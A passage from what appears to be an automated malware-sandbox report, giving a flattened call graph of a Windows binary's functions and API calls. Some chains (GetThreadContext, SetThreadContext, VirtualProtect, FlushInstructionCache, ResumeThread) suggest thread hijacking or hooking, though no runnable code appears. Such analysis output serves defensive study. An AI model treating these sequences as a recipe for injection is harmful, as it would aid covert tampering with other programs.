8421->8413 8424 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8422->8424 8425 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8423->8425 8426 286d7d1eea3 FreeEnvironmentStringsW 8424->8426 8425->8426 8426->8410 8429 286d7d1bdcd 8428->8429 8430 286d7d1d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8429->8430 8441 286d7d1be03 8430->8441 8431 286d7d1be0b 8432 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8431->8432 8434 286d7d1bd73 8432->8434 8433 286d7d1be6d 8435 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8433->8435 8434->8404 8435->8434 8436 286d7d1d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8436->8441 8437 286d7d1be92 8439 286d7d1bebc 13 API calls 8437->8439 8438 286d7d1c328 __std_exception_copy 38 API calls 8438->8441 8440 286d7d1be9a 8439->8440 8443 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8440->8443 8441->8431 8441->8433 8441->8436 8441->8437 8441->8438 8442 286d7d1bea6 8441->8442 8445 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8441->8445 8444 286d7d1d06c _invalid_parameter_noinfo 17 API calls 8442->8444 8443->8431 8446 286d7d1beb9 8444->8446 8445->8441 8742 286d7d12ab4 TlsGetValue TlsGetValue TlsGetValue 8743 286d7d12b0d 8742->8743 8745 286d7d12b79 8742->8745 8743->8745 8746 286d7d12b15 8743->8746 8744 286d7d12b74 8745->8744 8747 286d7d12c32 TlsSetValue TlsSetValue TlsSetValue 8745->8747 8749 286d7d13f88 StrCmpNIW 8745->8749 8746->8744 8746->8747 8748 286d7d13f88 StrCmpNIW 8746->8748 8747->8744 8748->8746 8749->8745 8750 286d7d1d658 8751 286d7d1d67d 8750->8751 8755 286d7d1d694 8750->8755 8752 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8751->8752 8754 286d7d1d682 8752->8754 8753 286d7d1d724 8757 286d7d1bb54 13 API calls 8753->8757 8756 286d7d1d04c _invalid_parameter_noinfo 38 API calls 8754->8756 8755->8753 8764 286d7d1d7b6 8755->8764 8766 286d7d1d6da 8755->8766 8783 286d7d1d894 8755->8783 8845 286d7d1da18 8755->8845 8778 286d7d1d68d 8756->8778 8758 286d7d1d77c 8757->8758 8760 286d7d1d784 8758->8760 8769 286d7d1d7d7 8758->8769 8763 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8760->8763 8762 286d7d1d836 8765 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8762->8765 8767 286d7d1d78b 8763->8767 8772 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8764->8772 8779 286d7d1d6fd 8764->8779 8768 286d7d1d841 8765->8768 8773 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8766->8773 8766->8779 8774 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8767->8774 8767->8779 8771 286d7d1d85a 8768->8771 8775 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8768->8775 8769->8762 8769->8769 8780 286d7d1d87c 8769->8780 8882 286d7d20eb8 8769->8882 8770 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8770->8778 8776 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8771->8776 8772->8764 8773->8766 8774->8767 8775->8768 8776->8778 8779->8770 8781 286d7d1d06c _invalid_parameter_noinfo 17 API calls 8780->8781 8782 286d7d1d891 8781->8782 8784 286d7d1d8c2 8783->8784 8784->8784 8785 286d7d1d8de 8784->8785 8786 286d7d1d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8784->8786 8785->8755 8787 286d7d1d90d 8786->8787 8788 286d7d1d926 8787->8788 8789 286d7d20eb8 38 API calls 8787->8789 8790 286d7d20eb8 38 API calls 8788->8790 8792 286d7d1d9fc 8788->8792 8789->8788 8791 286d7d1d943 8790->8791 8791->8792 8794 286d7d1d97f 8791->8794 8795 286d7d1d98d 8791->8795 8796 286d7d1d962 8791->8796 8793 286d7d1d06c _invalid_parameter_noinfo 17 API calls 8792->8793 8805 286d7d1da17 8793->8805 8799 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8794->8799 8797 286d7d1d977 8795->8797 8891 286d7d1eee0 8795->8891 8798 286d7d1d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8796->8798 8797->8794 8802 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8797->8802 8803 286d7d1d96d 8798->8803 8799->8792 8801 286d7d1da7a 8810 286d7d1da8c 8801->8810 8814 286d7d1daa1 8801->8814 8802->8794 8806 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8803->8806 8804 286d7d1d9b5 8807 286d7d1d9ba 8804->8807 8808 286d7d1d9d0 8804->8808 8805->8801 8900 286d7d213d8 8805->8900 8806->8797 8811 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8807->8811 8812 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8808->8812 8813 286d7d1d894 52 API calls 8810->8813 8811->8797 8812->8794 8827 286d7d1da9c 8813->8827 8816 286d7d1dd78 14 API calls 8814->8816 8815 286d7d18070 _invalid_parameter_noinfo 8 API calls 8817 286d7d1dd64 8815->8817 8818 286d7d1db0b 8816->8818 8817->8755 8819 286d7d1f198 9 API calls 8818->8819 8820 286d7d1db1a 8818->8820 8819->8820 8909 286d7d1d30c 8820->8909 8823 286d7d1dba8 8824 286d7d1d894 52 API calls 8823->8824 8826 286d7d1dbb8 8824->8826 8825 286d7d1dd78 14 API calls 8833 286d7d1dbd2 8825->8833 8826->8827 8828 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8826->8828 8827->8815 8828->8827 8829 286d7d1f198 9 API calls 8829->8833 8831 286d7d1d894 52 API calls 8831->8833 8832 286d7d1dcc8 FindNextFileW 8832->8833 8835 286d7d1dce0 8832->8835 8833->8825 8833->8829 8833->8831 8833->8832 8834 286d7d1dd2a 8833->8834 8836 286d7d1d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8833->8836 8931 286d7d1d4ac 8833->8931 8838 286d7d1dd38 FindClose 8834->8838 8842 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8834->8842 8837 286d7d1dd0c FindClose 8835->8837 8953 286d7d20b20 8835->8953 8836->8833 8837->8827 8841 286d7d1dd1c 8837->8841 8838->8827 8839 286d7d1dd48 8838->8839 8843 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8839->8843 8844 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8841->8844 8842->8838 8843->8827 8844->8827 8846 286d7d1da58 8845->8846 8847 286d7d1da7a 8845->8847 8846->8847 8848 286d7d213d8 38 API calls 8846->8848 8849 286d7d1da8c 8847->8849 8851 286d7d1daa1 8847->8851 8848->8846 8850 286d7d1d894 56 API calls 8849->8850 8852 286d7d1da9c 8850->8852 8854 286d7d1dd78 14 API calls 8851->8854 8853 286d7d18070 _invalid_parameter_noinfo 8 API calls 8852->8853 8855 286d7d1dd64 8853->8855 8856 286d7d1db0b 8854->8856 8855->8755 8857 286d7d1db1a 8856->8857 8858 286d7d1f198 9 API calls 8856->8858 8859 286d7d1d30c 16 API calls 8857->8859 8858->8857 8860 286d7d1db7b FindFirstFileExW 8859->8860 8861 286d7d1dba8 8860->8861 8870 286d7d1dbd2 8860->8870 8862 286d7d1d894 56 API calls 8861->8862 8864 286d7d1dbb8 8862->8864 8863 286d7d1dd78 14 API calls 8863->8870 8864->8852 8865 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8864->8865 8865->8852 8866 286d7d1f198 9 API calls 8866->8870 8867 286d7d1d4ac 16 API calls 8867->8870 8868 286d7d1d894 56 API calls 8868->8870 8869 286d7d1dcc8 FindNextFileW 8869->8870 8872 286d7d1dce0 8869->8872 8870->8863 8870->8866 8870->8867 8870->8868 8870->8869 8871 286d7d1dd2a 8870->8871 8873 286d7d1d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8870->8873 8875 286d7d1dd38 FindClose 8871->8875 8879 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8871->8879 8874 286d7d1dd0c FindClose 8872->8874 8877 286d7d20b20 38 API calls 8872->8877 8873->8870 8874->8852 8878 286d7d1dd1c 8874->8878 8875->8852 8876 286d7d1dd48 8875->8876 8880 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8876->8880 8877->8874 8881 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8878->8881 8879->8875 8880->8852 8881->8852 8885 286d7d20ed5 8882->8885 8883 286d7d20eda 8884 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8883->8884 8888 286d7d20ef0 8883->8888 8890 286d7d20ee4 8884->8890 8885->8883 8886 286d7d20f24 8885->8886 8885->8888 8886->8888 8889 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8886->8889 8887 286d7d1d04c _invalid_parameter_noinfo 38 API calls 8887->8888 8888->8769 8889->8890 8890->8887 8892 286d7d1ef1f 8891->8892 8893 286d7d1ef02 8891->8893 8895 286d7d1ef29 8892->8895 8961 286d7d219f0 8892->8961 8893->8892 8894 286d7d1ef10 8893->8894 8896 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8894->8896 8968 286d7d21a40 8895->8968 8899 286d7d1ef15 8896->8899 8899->8804 8901 286d7d213e0 8900->8901 8902 286d7d213f5 8901->8902 8903 286d7d2140e 8901->8903 8904 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8902->8904 8905 286d7d21405 8903->8905 8908 286d7d1dd78 14 API calls 8903->8908 8906 286d7d213fa 8904->8906 8905->8805 8907 286d7d1d04c _invalid_parameter_noinfo 38 API calls 8906->8907 8907->8905 8908->8905 8910 286d7d1d336 8909->8910 8911 286d7d1d35a 8909->8911 8914 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8910->8914 8918 286d7d1d345 FindFirstFileExW 8910->8918 8912 286d7d1d3bf 8911->8912 8913 286d7d1d35f 8911->8913 8915 286d7d1ec58 MultiByteToWideChar 8912->8915 8916 286d7d1d374 8913->8916 8913->8918 8919 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8913->8919 8914->8918 8926 286d7d1d3db 8915->8926 8920 286d7d1c5d0 14 API calls 8916->8920 8917 286d7d1d3e2 GetLastError 8921 286d7d1d184 13 API calls 8917->8921 8918->8823 8918->8833 8919->8916 8920->8918 8924 286d7d1d3ef 8921->8924 8922 286d7d1d420 8922->8918 8923 286d7d1ec58 MultiByteToWideChar 8922->8923 8927 286d7d1d47a 8923->8927 8928 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8924->8928 8925 286d7d1d413 8930 286d7d1c5d0 14 API calls 8925->8930 8926->8917 8926->8922 8926->8925 8929 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8926->8929 8927->8917 8927->8918 8928->8918 8929->8925 8930->8922 8932 286d7d1d4d6 8931->8932 8933 286d7d1d4fa 8931->8933 8936 286d7d1d4e5 8932->8936 8938 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8932->8938 8934 286d7d1d500 8933->8934 8935 286d7d1d55f 8933->8935 8934->8936 8939 286d7d1d515 8934->8939 8941 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8934->8941 8937 286d7d1ece8 WideCharToMultiByte 8935->8937 8936->8833 8940 286d7d1d583 8937->8940 8938->8936 8942 286d7d1c5d0 14 API calls 8939->8942 8943 286d7d1d58a GetLastError 8940->8943 8948 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8940->8948 8951 286d7d1d5bb 8940->8951 8952 286d7d1d5c7 8940->8952 8941->8939 8942->8936 8944 286d7d1d184 13 API calls 8943->8944 8945 286d7d1d597 8944->8945 8947 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8945->8947 8946 286d7d1ece8 WideCharToMultiByte 8950 286d7d1d629 8946->8950 8947->8936 8948->8951 8949 286d7d1c5d0 14 API calls 8949->8952 8950->8936 8950->8943 8951->8949 8952->8936 8952->8946 8954 286d7d20b52 8953->8954 8955 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8954->8955 8960 286d7d20b67 8954->8960 8956 286d7d20b5c 8955->8956 8957 286d7d1d04c _invalid_parameter_noinfo 38 API calls 8956->8957 8957->8960 8958 286d7d18070 _invalid_parameter_noinfo 8 API calls 8959 286d7d20ea8 8958->8959 8959->8837 8960->8958 8962 286d7d219f9 8961->8962 8963 286d7d21a12 HeapSize 8961->8963 8964 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8962->8964 8965 286d7d219fe 8964->8965 8966 286d7d1d04c _invalid_parameter_noinfo 38 API calls 8965->8966 8967 286d7d21a09 8966->8967 8967->8895 8969 286d7d21a5f 8968->8969 8970 286d7d21a55 8968->8970 8972 286d7d21a64 8969->8972 8978 286d7d21a6b Concurrency::details::SchedulerProxy::DeleteThis 8969->8978 8971 286d7d1c5d0 14 API calls 8970->8971 8976 286d7d21a5d 8971->8976 8973 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8972->8973 8973->8976 8974 286d7d21a71 8977 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8974->8977 8975 286d7d21a9e HeapReAlloc 8975->8976 8975->8978 8976->8899 8977->8976 8978->8974 8978->8975 8979 286d7d1b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 8978->8979 8979->8978 9219 286d7d1c1d8 9220 286d7d1c209 9219->9220 9221 286d7d1c1f1 9219->9221 9221->9220 9222 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9221->9222 9222->9220 8447 286d7d12ed8 8449 286d7d12f35 8447->8449 8448 286d7d12f50 8449->8448 8450 286d7d138a8 3 API calls 8449->8450 8450->8448 8451 286d7d1f6dc 8454 286d7d1f6e8 8451->8454 8452 286d7d1f70f 8454->8452 8455 286d7d21c0c 8454->8455 8456 286d7d21c11 8455->8456 8460 286d7d21c4c 8455->8460 8457 286d7d21c44 8456->8457 8458 286d7d21c32 DeleteCriticalSection 8456->8458 8459 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8457->8459 8458->8457 8458->8458 8459->8460 8460->8454 9223 286d7d125dc 9225 286d7d1265a 9223->9225 9224 286d7d12777 9225->9224 9226 286d7d126bf GetFileType 9225->9226 9227 286d7d126cd StrCpyW 9226->9227 9228 286d7d126e1 9226->9228 9232 286d7d126ee 9227->9232 9234 286d7d11ad4 GetFinalPathNameByHandleW 9228->9234 9230 286d7d13f88 StrCmpNIW 9230->9232 9232->9224 9232->9230 9239 286d7d13708 StrCmpIW 9232->9239 9243 286d7d11dd4 9232->9243 9235 286d7d11b3d 9234->9235 9236 286d7d11afe StrCmpNIW 9234->9236 9235->9232 9236->9235 9237 286d7d11b18 lstrlenW 9236->9237 9237->9235 9238 286d7d11b2a StrCpyW 9237->9238 9238->9235 9240 286d7d1373a StrCpyW StrCatW 9239->9240 9241 286d7d13751 PathCombineW 9239->9241 9242 286d7d1375a 9240->9242 9241->9242 9242->9232 9244 286d7d11deb 9243->9244 9245 286d7d11df4 9243->9245 9246 286d7d11530 2 API calls 9244->9246 9245->9232 9246->9245 8138 286d7d23960 8148 286d7d18ca0 8138->8148 8140 286d7d23988 8142 286d7d19324 _CreateFrameInfo 9 API calls 8143 286d7d23998 8142->8143 8144 286d7d19324 _CreateFrameInfo 9 API calls 8143->8144 8145 286d7d239a1 8144->8145 8152 286d7d1c2f4 8145->8152 8151 286d7d18cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8148->8151 8149 286d7d18dd1 8149->8140 8149->8142 8150 286d7d18d94 RtlUnwindEx 8150->8151 8151->8149 8151->8150 8153 286d7d1cab0 _invalid_parameter_noinfo 14 API calls 8152->8153 8154 286d7d1c2fd 8153->8154 8461 286d7d206e0 8462 286d7d206e9 8461->8462 8463 286d7d206f9 8461->8463 8464 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8462->8464 8465 286d7d206ee 8464->8465 8466 286d7d1d04c _invalid_parameter_noinfo 38 API calls 8465->8466 8466->8463 8980 286d7d2485e 8981 286d7d19324 _CreateFrameInfo 9 API calls 8980->8981 8982 286d7d2486c 8981->8982 8983 286d7d24877 8982->8983 8984 286d7d19324 _CreateFrameInfo 9 API calls 8982->8984 8984->8983 8155 286d7d17f60 8156 286d7d17f7c 8155->8156 8157 286d7d17f81 8155->8157 8159 286d7d18090 8156->8159 8160 286d7d18127 8159->8160 8161 286d7d180b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8159->8161 8160->8157 8161->8160 8985 286d7d2465f 8986 286d7d246e2 8985->8986 8987 286d7d24677 8985->8987 8987->8986 8988 286d7d19324 _CreateFrameInfo 9 API calls 8987->8988 8989 286d7d246c4 8988->8989 8990 286d7d19324 _CreateFrameInfo 9 API calls 8989->8990 8991 286d7d246d9 8990->8991 8992 286d7d1c2f4 14 API calls 8991->8992 8992->8986 9247 286d7d163e3 9248 286d7d163f0 9247->9248 9249 286d7d163fc GetThreadContext 9248->9249 9255 286d7d1655a 9248->9255 9250 286d7d16422 9249->9250 9249->9255 9250->9255 9256 286d7d16449 9250->9256 9251 286d7d1663e 9253 286d7d1665e 9251->9253 9257 286d7d14b20 VirtualFree 9251->9257 9252 286d7d16581 VirtualProtect FlushInstructionCache 9252->9255 9254 286d7d15530 3 API calls 9253->9254 9262 286d7d16663 9254->9262 9255->9251 9255->9252 9258 286d7d164cd 9256->9258 9259 286d7d164a6 SetThreadContext 9256->9259 9257->9253 9259->9258 9260 286d7d166b7 9263 286d7d18070 _invalid_parameter_noinfo 8 API calls 9260->9263 9261 286d7d16677 ResumeThread 9261->9262 9262->9260 9262->9261 9264 286d7d166ff 9263->9264 9265 286d7d1f3e4 9266 286d7d1f41d 9265->9266 9267 286d7d1f3ee 9265->9267 9267->9266 9268 286d7d1f403 FreeLibrary 9267->9268 9268->9267 9269 286d7d233e4 9270 286d7d233fb 9269->9270 9271 286d7d233f5 CloseHandle 9269->9271 9271->9270 8993 286d7d24848 8996 286d7d1904c 8993->8996 8997 286d7d19076 8996->8997 8998 286d7d19064 8996->8998 8999 286d7d19324 _CreateFrameInfo 9 API calls 8997->8999 8998->8997 9000 286d7d1906c 8998->9000 9002 286d7d1907b 8999->9002 9001 286d7d19074 9000->9001 9003 286d7d19324 _CreateFrameInfo 9 API calls 9000->9003 9002->9001 9004 286d7d19324 _CreateFrameInfo 9 API calls 9002->9004 9005 286d7d1909b 9003->9005 9004->9001 9006 286d7d19324 _CreateFrameInfo 9 API calls 9005->9006 9007 286d7d190a8 9006->9007 9008 286d7d1c2f4 14 API calls 9007->9008 9009 286d7d190b1 9008->9009 9010 286d7d1c2f4 14 API calls 9009->9010 9011 286d7d190bd 9010->9011 8171 286d7d1ad48 8172 286d7d19324 _CreateFrameInfo 9 API calls 8171->8172 8173 286d7d1ad7d 8172->8173 8174 286d7d19324 _CreateFrameInfo 9 API calls 8173->8174 8175 286d7d1ad8b __except_validate_context_record 8174->8175 8176 286d7d19324 _CreateFrameInfo 9 API calls 8175->8176 8177 286d7d1adcf 8176->8177 8178 286d7d19324 _CreateFrameInfo 9 API calls 8177->8178 8179 286d7d1add8 8178->8179 8180 286d7d19324 _CreateFrameInfo 9 API calls 8179->8180 8181 286d7d1ade1 8180->8181 8194 286d7d1993c 8181->8194 8184 286d7d19324 _CreateFrameInfo 9 API calls 8185 286d7d1ae11 __CxxCallCatchBlock 8184->8185 8186 286d7d19978 __CxxCallCatchBlock 9 API calls 8185->8186 8191 286d7d1aec2 8186->8191 8187 286d7d1aeeb __CxxCallCatchBlock 8188 286d7d19324 _CreateFrameInfo 9 API calls 8187->8188 8189 286d7d1aefe 8188->8189 8190 286d7d19324 _CreateFrameInfo 9 API calls 8189->8190 8192 286d7d1af07 8190->8192 8191->8187 8193 286d7d18ff8 __CxxCallCatchBlock 9 API calls 8191->8193 8193->8187 8195 286d7d19324 _CreateFrameInfo 9 API calls 8194->8195 8196 286d7d1994d 8195->8196 8197 286d7d19958 8196->8197 8198 286d7d19324 _CreateFrameInfo 9 API calls 8196->8198 8199 286d7d19324 _CreateFrameInfo 9 API calls 8197->8199 8198->8197 8200 286d7d19969 8199->8200 8200->8184 8200->8185 9012 286d7d1824c 9014 286d7d18270 __scrt_release_startup_lock 9012->9014 9013 286d7d1b581 9014->9013 9015 286d7d1cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9014->9015 9016 286d7d1b5aa 9015->9016 9272 286d7d15fcc 9273 286d7d15fd3 9272->9273 9274 286d7d16000 VirtualProtect 9273->9274 9275 286d7d15f10 9273->9275 9274->9275 9276 286d7d16029 GetLastError 9274->9276 9276->9275 9277 286d7d219d0 9278 286d7d1e864 56 API calls 9277->9278 9279 286d7d219d9 9278->9279 8201 286d7d2494f 8202 286d7d24968 8201->8202 8203 286d7d2495e 8201->8203 8205 286d7d1c5ac LeaveCriticalSection 8203->8205 8470 286d7d1b0d4 8477 286d7d1b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8470->8477 8471 286d7d1b0fb 8472 286d7d19324 _CreateFrameInfo 9 API calls 8471->8472 8473 286d7d1b100 8472->8473 8474 286d7d19324 _CreateFrameInfo 9 API calls 8473->8474 8475 286d7d1b10b __FrameHandler3::GetHandlerSearchState 8473->8475 8474->8475 8476 286d7d199cc 9 API calls Is_bad_exception_allowed 8476->8477 8477->8471 8477->8475 8477->8476 8479 286d7d199f4 8477->8479 8480 286d7d19324 _CreateFrameInfo 9 API calls 8479->8480 8481 286d7d19a02 8480->8481 8481->8477 9017 286d7d12e54 9018 286d7d12ea8 9017->9018 9019 286d7d12ec3 9018->9019 9021 286d7d137f4 9018->9021 9022 286d7d1388a 9021->9022 9024 286d7d13819 9021->9024 9022->9019 9023 286d7d13f88 StrCmpNIW 9023->9024 9024->9022 9024->9023 9025 286d7d11e08 StrCmpIW StrCmpW 9024->9025 9025->9024 9280 286d7d15ff9 9281 286d7d16000 VirtualProtect 9280->9281 9282 286d7d16029 GetLastError 9281->9282 9283 286d7d15f10 9281->9283 9282->9283 9284 286d7d141f9 9285 286d7d14146 9284->9285 9286 286d7d14196 VirtualQuery 9285->9286 9287 286d7d141ca VirtualAlloc 9285->9287 9289 286d7d141b0 9285->9289 9286->9285 9286->9289 9288 286d7d141fb GetLastError 9287->9288 9287->9289 9288->9285 9288->9289 9026 286d7d2387c 9027 286d7d238b4 __GSHandlerCheckCommon 9026->9027 9028 286d7d238e0 9027->9028 9030 286d7d19a24 9027->9030 9031 286d7d19324 _CreateFrameInfo 9 API calls 9030->9031 9032 286d7d19a4e 9031->9032 9033 286d7d19324 _CreateFrameInfo 9 API calls 9032->9033 9034 286d7d19a5b 9033->9034 9035 286d7d19324 _CreateFrameInfo 9 API calls 9034->9035 9036 286d7d19a64 9035->9036 9036->9028 9290 286d7d1cbfc 9295 286d7d1f3a0 9290->9295 9292 286d7d1cc05 9293 286d7d1cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9292->9293 9294 286d7d1cc22 __vcrt_uninitialize_ptd 9292->9294 9293->9294 9296 286d7d1f3b1 9295->9296 9297 286d7d1f3b5 9295->9297 9296->9292 9297->9296 9298 286d7d1ef88 9 API calls 9297->9298 9298->9296 8206 286d7d1c180 8209 286d7d1bf38 8206->8209 8216 286d7d1bf00 8209->8216 8217 286d7d1bf10 8216->8217 8218 286d7d1bf15 8216->8218 8219 286d7d1bebc 13 API calls 8217->8219 8220 286d7d1bf1c 8218->8220 8219->8218 8221 286d7d1bf2c 8220->8221 8222 286d7d1bf31 8220->8222 8223 286d7d1bebc 13 API calls 8221->8223 8224 286d7d1bebc 8222->8224 8223->8222 8225 286d7d1bec1 8224->8225 8229 286d7d1bef2 8224->8229 8226 286d7d1beea 8225->8226 8227 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8225->8227 8228 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8226->8228 8227->8225 8228->8229 8482 286d7d1b500 8487 286d7d1c558 EnterCriticalSection 8482->8487 8488 286d7d12300 8489 286d7d12331 8488->8489 8490 286d7d12447 8489->8490 8496 286d7d12412 8489->8496 8498 286d7d12355 8489->8498 8491 286d7d1244c 8490->8491 8493 286d7d124bb 8490->8493 8505 286d7d135c8 GetProcessHeap HeapAlloc 8491->8505 8494 286d7d135c8 11 API calls 8493->8494 8493->8496 8494->8496 8495 286d7d1238d StrCmpNIW 8495->8498 8498->8495 8498->8496 8499 286d7d11d30 8498->8499 8500 286d7d11d57 GetProcessHeap HeapAlloc 8499->8500 8502 286d7d11db4 8499->8502 8501 286d7d11d92 8500->8501 8500->8502 8503 286d7d11cfc 2 API calls 8501->8503 8502->8498 8504 286d7d11d9a GetProcessHeap HeapFree 8503->8504 8504->8502 8507 286d7d1361b 8505->8507 8506 286d7d136d9 GetProcessHeap HeapFree 8506->8496 8507->8506 8508 286d7d136d4 8507->8508 8509 286d7d13666 StrCmpNIW 8507->8509 8510 286d7d11d30 6 API calls 8507->8510 8508->8506 8509->8507 8510->8507 9299 286d7d127e8 9301 286d7d12867 9299->9301 9300 286d7d12998 9301->9300 9302 286d7d128c9 GetFileType 9301->9302 9303 286d7d128d7 StrCpyW 9302->9303 9304 286d7d128ed 9302->9304 9305 286d7d128fc 9303->9305 9306 286d7d11ad4 4 API calls 9304->9306 9309 286d7d1299d 9305->9309 9311 286d7d12906 9305->9311 9306->9305 9307 286d7d13f88 StrCmpNIW 9307->9309 9308 286d7d13f88 StrCmpNIW 9308->9311 9309->9300 9309->9307 9310 286d7d13708 4 API calls 9309->9310 9312 286d7d11dd4 2 API calls 9309->9312 9310->9309 9311->9300 9311->9308 9313 286d7d13708 4 API calls 9311->9313 9314 286d7d11dd4 2 API calls 9311->9314 9312->9309 9313->9311 9314->9311 9315 286d7d1b7ea 9316 286d7d1c2f4 14 API calls 9315->9316 9317 286d7d1b7ef 9316->9317 9318 286d7d1b85f 9317->9318 9319 286d7d1b815 GetModuleHandleW 9317->9319 9332 286d7d1b6f8 9318->9332 9319->9318 9323 286d7d1b822 9319->9323 9323->9318 9327 286d7d1b904 GetModuleHandleExW 9323->9327 9328 286d7d1b938 GetProcAddress 9327->9328 9331 286d7d1b94a 9327->9331 9328->9331 9329 286d7d1b95b FreeLibrary 9330 286d7d1b962 9329->9330 9330->9318 9331->9329 9331->9330 9344 286d7d1c558 EnterCriticalSection 9332->9344 8230 286d7d1f370 VirtualProtect 9045 286d7d1f870 9047 286d7d1f8c7 9045->9047 9048 286d7d1f8a0 9045->9048 9046 286d7d1cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9052 286d7d1f8b4 9046->9052 9049 286d7d1f99c 9047->9049 9068 286d7d1c558 EnterCriticalSection 9047->9068 9048->9046 9048->9047 9048->9052 9053 286d7d1fab3 9049->9053 9056 286d7d1fa03 9049->9056 9060 286d7d1f9ca 9049->9060 9050 286d7d1f904 9052->9047 9052->9050 9055 286d7d1f949 9052->9055 9054 286d7d1fac0 9053->9054 9070 286d7d1c5ac LeaveCriticalSection 9053->9070 9058 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9055->9058 9065 286d7d1fa61 9056->9065 9069 286d7d1c5ac LeaveCriticalSection 9056->9069 9061 286d7d1f94e 9058->9061 9060->9056 9062 286d7d1cab0 _invalid_parameter_noinfo 14 API calls 9060->9062 9063 286d7d1d04c _invalid_parameter_noinfo 38 API calls 9061->9063 9064 286d7d1f9f3 9062->9064 9063->9050 9066 286d7d1cab0 _invalid_parameter_noinfo 14 API calls 9064->9066 9067 286d7d1cab0 14 API calls _invalid_parameter_noinfo 9065->9067 9066->9056 9067->9065 9345 286d7d12ff0 9346 286d7d13061 9345->9346 9347 286d7d13384 9346->9347 9348 286d7d1308d GetModuleHandleA 9346->9348 9349 286d7d1309f GetProcAddress 9348->9349 9350 286d7d130b1 9348->9350 9349->9350 9350->9347 9351 286d7d130d8 StrCmpNIW 9350->9351 9351->9347 9357 286d7d130fd 9351->9357 9352 286d7d11a30 6 API calls 9352->9357 9353 286d7d1320f lstrlenW 9353->9357 9354 286d7d132b9 lstrlenW 9354->9357 9355 286d7d13f88 StrCmpNIW 9355->9357 9356 286d7d11cfc StrCmpIW StrCmpW 9356->9357 9357->9347 9357->9352 9357->9353 9357->9354 9357->9355 9357->9356 8514 286d7d246f5 8515 286d7d19324 _CreateFrameInfo 9 API calls 8514->8515 8516 286d7d2470d 8515->8516 8517 286d7d19324 _CreateFrameInfo 9 API calls 8516->8517 8518 286d7d24728 8517->8518 8519 286d7d19324 _CreateFrameInfo 9 API calls 